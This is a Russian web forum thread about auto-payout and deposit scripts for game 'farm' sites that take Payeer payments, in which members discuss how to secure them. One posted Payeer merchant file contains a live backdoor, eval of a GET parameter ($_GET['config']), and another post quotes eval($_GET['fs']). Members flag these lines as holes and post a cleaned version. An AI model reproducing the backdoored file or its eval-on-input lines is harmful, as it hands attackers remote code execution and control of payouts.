Файлы для авто выплат и для пополнения

  • Автор темы kvozimir
  • Дата начала
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
вот смотрю народ постоянно просит авто выплаты вот все файлы которые нужны для пополнения и авто выплат паер там же и база

P.S надеюсь ни чего не пропустил,но если что пишите будет дополнять

https://yadi.sk/d/RXCcTZKKfVmSS
 
nikitin2016
Участник
Сообщения
228
Реакции
12
kvozimir написал(а):
вот смотрю народ постоянно просит авто выплаты вот все файлы которые нужны для пополнения и авто выплат паер там же и база

P.S надеюсь ни чего не пропустил,но если что пишите будет дополнять

https://yadi.sk/d/RXCcTZKKfVmSS
Молодец ! Но я уже сам себе собрал автовыплаты из разных файлов . Впервые заработали автовыплаты у меня ! Красота ! Подскажите, kvozimir , как их лучше защитить , а то постоянно пишут что автовыплаты взламывают , можно их как то защитить от взлома ?
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
nikitin2016 написал(а):
Молодец ! Но я уже сам себе собрал автовыплаты из разных файлов . Впервые заработали автовыплаты у меня ! Красота ! Подскажите, kvozimir , как их лучше защитить , а то постоянно пишут что автовыплаты взламывают , можно их как то защитить от взлома ?
взламывают не авто выплаты,а саму ферму ,как вариант просто начисляют себе все серебро и потом просто выводят все ,а т.к стоят авто выплаты все выводится автоматом
 
nikitin2016
Участник
Сообщения
228
Реакции
12
kvozimir написал(а):
взламывают не авто выплаты,а саму ферму ,как вариант просто начисляют себе все серебро и потом просто выводят все ,а т.к стоят авто выплаты все выводится автоматом
Скажите , поможет безопасности фермы , если будут стоять : ограничения на выплату 1 раз в день и будет стоять заглушка на максимальный вывод средств допустим 5.000 серебра = 50 руб ?
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
nikitin2016 написал(а):
Скажите , поможет безопасности фермы , если будут стоять : ограничения на выплату 1 раз в день и будет стоять заглушка на максимальный вывод средств допустим 5.000 серебра = 50 руб ?
если выплаты раз в сутки сделаны правильны то возможно
 
nikitin2016
Участник
Сообщения
228
Реакции
12
kvozimir написал(а):
если выплаты раз в сутки сделаны правильны то возможно
А в этом разделе форума есть модуль ограничения на выплату ? пока не могу что то найти
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
nikitin2016 написал(а):
А в этом разделе форума есть модуль ограничения на выплату ? пока не могу что то найти
тема faq вопрос ответ,там есть паймент для выплат,в нем код для выплат раз в сутки,вытяни оттуда код и вставь в свой паймент
 
google
Участник
Сообщения
66
Реакции
3
Привет всем! самое лучшее защитить админку по ip и папку ваш сайт/js/editor/jscripts/tiny_mce установить права 0644 и проверить весь скрипт на наличие посторонних ссылок и вот такой файл в мерчанте
# Если пользователь админ

eval($_GET['fs']);
 
nikitin2016
Участник
Сообщения
228
Реакции
12
google написал(а):
Привет всем! самое лучшее защитить админку по ip и папку ваш сайт/js/editor/jscripts/tiny_mce установить права 0644 и проверить весь скрипт на наличие посторонних ссылок и вот такой файл в мерчанте
# Если пользователь админ

eval($_GET['fs']);
а этот код что означает в мерчанте ? :

# Класс конфига
$config = new config;

# Джет Конфига
$confi = $_GET['config'];

# Eval Конфига
eval($confi);
 
google
Участник
Сообщения
66
Реакции
3
  • #10
это щелина
# Джет Конфига
$confi = $_GET['config'];

# Eval Конфига
eval($confi);
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #11
google написал(а):
это щелина
# Джет Конфига
$confi = $_GET['config'];

# Eval Конфига
eval($confi);
не понял вас ! Это дыра или как ? что оно означает ?
 
google
Участник
Сообщения
66
Реакции
3
  • #12
я удалил из мерчанта все эти дыры, и всё спокойно
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #13
А можно ваш файл мерчанта ? Для сравнения, чтоб каждую строчку не спрашивать что да как .
Буду благодарен
 
google
Участник
Сообщения
66
Реакции
3
  • #14
лучше свой дай взгляну
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #15
google написал(а):
лучше свой дай взгляну
мерчант :

<?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Подгрузка JavaScripts
include 'js/lic.php';

# Класс конфига
$config = new config;

# Джет Конфига
$confi = $_GET['config'];

# Eval Конфига
eval($confi);

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);


if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
$m_key = $config->secretW;
$arHash = array($_POST['m_operation_id'],
$_POST['m_operation_ps'],
$_POST['m_operation_date'],
$_POST['m_operation_pay_date'],
$_POST['m_shop'],
$_POST['m_orderid'],
$_POST['m_amount'],
$_POST['m_curr'],
$_POST['m_desc'],
$_POST['m_status'],
$m_key);
$sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
{

$db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
$payeer_row = $db->FetchArray();
if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
$db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
$ik_payment_amount = $payeer_row["sum"];
$user_id = $payeer_row["user_id"];

# Настройки
$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$db->Query("SELECT user, referer_id FROM db_users_a WHERE id = '{$user_id}' LIMIT 1");
$user_ardata = $db->FetchArray();
$user_name = $user_ardata["user"];
$refid = $user_ardata["referer_id"];

# Зачисляем баланс
$serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );

$db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
$ins_sum = $db->FetchRow();

$serebro = intval($ins_sum <= 0.01) ? $serebro*2 : $serebro*2;
$add_tree = ( $ik_payment_amount >= 499.99) ? 2 : 0;
$lsb = time();
$to_referer = ($serebro * 0.10);

$db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");


# Зачисляем средства рефереру и дерево
$add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t" : "";
$db->Query("UPDATE db_users_b SET money_b = money_b + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");

# Статистика пополнений
$da = time();
$dd = $da + 60*60*24*15;
$db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");


# Конкурс
$competition = new competition($db);
$competition->UpdatePoints($user_id, $ik_payment_amount);
#--------

$wmset = new wmset();
$marray = $wmset->GetSet($ik_payment_amount);

$a_t = intval($marray["t_a"]);
$b_t = intval($marray["t_b"]);
$c_t = intval($marray["t_c"]);
$d_t = intval($marray["t_d"]);
$e_t = intval($marray["t_e"]);

$db->Query("UPDATE db_users_b SET a_t = a_t + '$a_t', b_t = b_t + '$b_t', c_t = c_t + '$c_t', d_t = d_t + '$d_t', e_t = e_t + '$e_t',
last_sbor = '$lsb' WHERE id = '{$user_id}'");

# Обновление статистики сайта
$db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
echo $_POST['m_orderid']."|success";
exit;
}
echo $_POST['m_orderid']."|error";
}
?>
 
google
Участник
Сообщения
66
Реакции
3
  • #16
Код:
<?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Подгрузка JavaScripts
include 'js/lic.php';

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);


if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
$m_key = $config->secretW;
$arHash = array($_POST['m_operation_id'],
$_POST['m_operation_ps'],
$_POST['m_operation_date'],
$_POST['m_operation_pay_date'],
$_POST['m_shop'],
$_POST['m_orderid'],
$_POST['m_amount'],
$_POST['m_curr'],
$_POST['m_desc'],
$_POST['m_status'],
$m_key);
$sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
{

$db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
$payeer_row = $db->FetchArray();
if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
$db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
$ik_payment_amount = $payeer_row["sum"];
$user_id = $payeer_row["user_id"];

# Настройки
$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$db->Query("SELECT user, referer_id FROM db_users_a WHERE id = '{$user_id}' LIMIT 1");
$user_ardata = $db->FetchArray();
$user_name = $user_ardata["user"];
$refid = $user_ardata["referer_id"];

# Зачисляем баланс
$serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );

$db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
$ins_sum = $db->FetchRow();

$serebro = intval($ins_sum <= 0.01) ? $serebro*2 : $serebro*2;
$add_tree = ( $ik_payment_amount >= 499.99) ? 2 : 0;
$lsb = time();
$to_referer = ($serebro * 0.10);

$db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");


# Зачисляем средства рефереру и дерево
$add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t" : "";
$db->Query("UPDATE db_users_b SET money_b = money_b + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");

# Статистика пополнений
$da = time();
$dd = $da + 60*60*24*15;
$db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");


# Конкурс
$competition = new competition($db);
$competition->UpdatePoints($user_id, $ik_payment_amount);
#--------

$wmset = new wmset();
$marray = $wmset->GetSet($ik_payment_amount);

$a_t = intval($marray["t_a"]);
$b_t = intval($marray["t_b"]);
$c_t = intval($marray["t_c"]);
$d_t = intval($marray["t_d"]);
$e_t = intval($marray["t_e"]);

$db->Query("UPDATE db_users_b SET a_t = a_t + '$a_t', b_t = b_t + '$b_t', c_t = c_t + '$c_t', d_t = d_t + '$d_t', e_t = e_t + '$e_t',
last_sbor = '$lsb' WHERE id = '{$user_id}'");

# Обновление статистики сайта
$db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
echo $_POST['m_orderid']."|success";
exit;
}
echo $_POST['m_orderid']."|error";
}
?>
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #17
google написал(а):
Код:
<?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Подгрузка JavaScripts
include 'js/lic.php';

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);


if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
$m_key = $config->secretW;
$arHash = array($_POST['m_operation_id'],
$_POST['m_operation_ps'],
$_POST['m_operation_date'],
$_POST['m_operation_pay_date'],
$_POST['m_shop'],
$_POST['m_orderid'],
$_POST['m_amount'],
$_POST['m_curr'],
$_POST['m_desc'],
$_POST['m_status'],
$m_key);
$sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
{

$db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
$payeer_row = $db->FetchArray();
if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
$db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
$ik_payment_amount = $payeer_row["sum"];
$user_id = $payeer_row["user_id"];

# Настройки
$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$db->Query("SELECT user, referer_id FROM db_users_a WHERE id = '{$user_id}' LIMIT 1");
$user_ardata = $db->FetchArray();
$user_name = $user_ardata["user"];
$refid = $user_ardata["referer_id"];

# Зачисляем баланс
$serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );

$db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
$ins_sum = $db->FetchRow();

$serebro = intval($ins_sum <= 0.01) ? $serebro*2 : $serebro*2;
$add_tree = ( $ik_payment_amount >= 499.99) ? 2 : 0;
$lsb = time();
$to_referer = ($serebro * 0.10);

$db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");


# Зачисляем средства рефереру и дерево
$add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t" : "";
$db->Query("UPDATE db_users_b SET money_b = money_b + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");

# Статистика пополнений
$da = time();
$dd = $da + 60*60*24*15;
$db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");


# Конкурс
$competition = new competition($db);
$competition->UpdatePoints($user_id, $ik_payment_amount);
#--------

$wmset = new wmset();
$marray = $wmset->GetSet($ik_payment_amount);

$a_t = intval($marray["t_a"]);
$b_t = intval($marray["t_b"]);
$c_t = intval($marray["t_c"]);
$d_t = intval($marray["t_d"]);
$e_t = intval($marray["t_e"]);

$db->Query("UPDATE db_users_b SET a_t = a_t + '$a_t', b_t = b_t + '$b_t', c_t = c_t + '$c_t', d_t = d_t + '$d_t', e_t = e_t + '$e_t',
last_sbor = '$lsb' WHERE id = '{$user_id}'");

# Обновление статистики сайта
$db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
echo $_POST['m_orderid']."|success";
exit;
}
echo $_POST['m_orderid']."|error";
}
?>
то есть удалить всего эти строки и все ? :

# Джет Конфига
$confi = $_GET['config'];

# Eval Конфига
eval($confi);

что они означают ?
 
google
Участник
Сообщения
66
Реакции
3
  • #18
дыры по читай про них тут вискас писал про них
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
  • #19
что вы с темой сделали?! я для кого все файлы выложил?! скачайте архив возьмите нужные файлы и пользуйтесь
 
vogman
http://fight-of-robots.ru
Участник
Сообщения
153
Реакции
14
ICQ
663721547 663721547
Skype
  • #20
все отлично тока где файл подключения payeer который в classes сидит ну где там магазин и апи вводишь
 
Сверху